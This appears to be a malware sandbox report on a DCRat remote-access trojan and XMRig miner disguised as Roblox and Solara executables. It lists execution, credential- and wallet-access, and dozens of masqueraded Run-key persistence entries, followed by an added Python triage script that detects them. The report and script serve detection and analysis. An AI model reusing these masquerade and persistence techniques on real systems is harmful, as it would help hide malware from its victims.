Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Cursors\smss.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
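
The Run entries above all come from a single writer and point at copies named csrss.exe, smss.exe, conhost.exe, dllhost.exe and similar, dropped in directories Windows never uses for those binaries. The script below is an added triage example, not part of this sandbox report or of any tooling the report's author used: it parses rows in the report's own "Set value (str)" format and applies three checks that together characterise this persistence set. The sample rows are copied from the table above, except for a OneDrive row that is an assumed benign entry added so the clean path is exercised; the rule names and thresholds are the author's own assumptions.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Row format of this report's "Adds Run key" table:
#   Set value (str) <key> = "<value, with \" and \\ escapes>" <writer process> N/A
ROW_RE = re.compile(
    r'^Set value \(str\) (?P<key>.+?) = "(?P<value>.*)" (?P<writer>\S+) N/A$'
)

# Processes Windows starts itself (session manager, csrss, COM/WMI hosts, the
# servicing stack). None of them is registered under a Run key on a clean
# system, so a Run value whose target carries one of these names is a
# masquerade no matter which directory the copy lives in.
SYSTEM_PROCESS_NAMES = {
    "csrss.exe", "smss.exe", "conhost.exe", "dllhost.exe", "runtimebroker.exe",
    "wmiprvse.exe", "fontdrvhost.exe", "backgroundtaskhost.exe", "trustedinstaller.exe",
}

# Constructed sample: four rows copied from the table above plus one benign
# OneDrive row (assumed, not from the report) so the clean path is exercised.
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A',
]


def parse_row(line):
    """Return {hive, name, target, writer} for one table row, or None if it is not a Run row."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    key = m.group("key")
    hive = "HKLM" if key.startswith(r"\REGISTRY\MACHINE") else "HKU"
    name = key.rsplit("\\Run\\", 1)[-1]            # value name, may contain spaces
    # Undo the report's C-style escaping (\" -> ", \\ -> \) and the outer quotes.
    target = re.sub(r"\\(.)", r"\1", m.group("value")).strip('"')
    return {"hive": hive, "name": name, "target": target, "writer": m.group("writer")}


def triage(rows, bulk_threshold=3):
    """Apply three checks and return (rule, hive, name, detail) findings."""
    entries = [e for e in map(parse_row, rows) if e]
    findings = []
    hives_for = defaultdict(set)    # value name -> hives it was registered in
    per_writer = defaultdict(int)   # writer process -> number of Run values it set
    for e in entries:
        hives_for[e["name"]].add(e["hive"])
        per_writer[e["writer"]] += 1
        # Rule 1: a system-process name registered for Run autostart.
        if PureWindowsPath(e["target"]).name.lower() in SYSTEM_PROCESS_NAMES:
            findings.append(("system_process_masquerade", e["hive"], e["name"], e["target"]))
    # Rule 2: the same value name set in both HKLM and the user hive (redundant persistence).
    for name, hives in hives_for.items():
        if {"HKLM", "HKU"} <= hives:
            findings.append(("both_hives", "HKLM+HKU", name, ""))
    # Rule 3: one process writing many Run values in a single session.
    for writer, n in per_writer.items():
        if n >= bulk_threshold:
            findings.append(("bulk_writer", "", writer, f"{n} Run values"))
    return findings


if __name__ == "__main__":
    for rule, hive, name, detail in triage(SAMPLE_ROWS):
        print(f"{rule:26} {hive:9} {name:18} {detail}")
```

Against the full table above, rule 1 fires on every csrss, smss, conhost, dllhost, RuntimeBroker, WmiPrvSE, fontdrvhost, backgroundTaskHost and TrustedInstaller entry, rule 2 on each name that appears in both hives, and rule 3 on Refcrt.exe alone; the "Microsoft Paint" entry written by faildsfsdf.exe is a separate component and is only caught if you extend rule 1 with a display-name/basename mismatch check, which is noisier on real hosts.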

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
